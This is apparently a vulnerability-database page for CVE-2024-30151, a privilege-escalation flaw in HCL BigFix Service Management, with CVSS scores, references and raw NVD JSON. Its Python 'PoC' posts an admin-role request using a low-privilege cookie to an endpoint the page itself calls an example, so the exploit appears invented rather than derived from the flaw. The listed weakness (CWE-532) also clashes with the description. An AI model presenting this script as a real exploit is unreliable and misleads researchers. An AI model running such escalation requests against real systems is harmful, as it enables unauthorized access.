CVE-2024-30151

Description

HCL BigFix Service Management (SX) is affected by a Broken Access Control vulnerability leading to privilege escalation. This could allow unauthorized users to gain elevated privileges, bypassing intended access restrictions. This may result in exposure of sensitive data or unauthorized system modifications

CVSS Details

CVSS Score

8.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_service_management:23.0:*:*:*:*:*:*:* - VULNERABLE

HCL BigFix Service Management (SX) (具体受影响版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# PoC for CVE-2024-30151: Broken Access Control / Privilege Escalation
# Target: HCL BigFix Service Management (SX)
# Preconditions: Attacker has a valid low-privilege session.

target_host = "https://target-host.com"
vulnerable_endpoint = "/api/sx/admin/escalate"  # Example endpoint

# Attacker's cookie (Low Privilege)
cookies = {
    "JSESSIONID": "LOW_PRIV_USER_SESSION_ID"
}

# Payload attempting to grant admin privileges
payload = {
    "username": "attacker",
    "role": "admin"
}

headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/json"
}

try:
    # Send request to escalate privileges
    response = requests.post(target_host + vulnerable_endpoint, json=payload, cookies=cookies, headers=headers, verify=False)

    if response.status_code == 200:
        print("[+] Potential Privilege Escalation Successful!")
        print("[+] Response Body:", response.text)
    else:
        print("[-] Exploit failed. Status Code:", response.status_code)
        print("[-] Response:", response.text)

except Exception as e:
    print("Error:", e)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-30151
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-30151
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-30151/
[4] VulDB https://vuldb.com/cve/CVE-2024-30151
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127782

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-30151", "sourceIdentifier": "[email protected]", "published": "2026-05-06T19:16:35.040", "lastModified": "2026-05-07T17:06:09.753", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Service Management (SX) is affected by a Broken Access Control vulnerability leading to privilege escalation. This could allow unauthorized users to gain elevated privileges, bypassing intended access restrictions. This may result in exposure of sensitive data or unauthorized system modifications"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_service_management:23.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D915AC1-7C2B-497D-9A77-9726954B2282"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127782", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}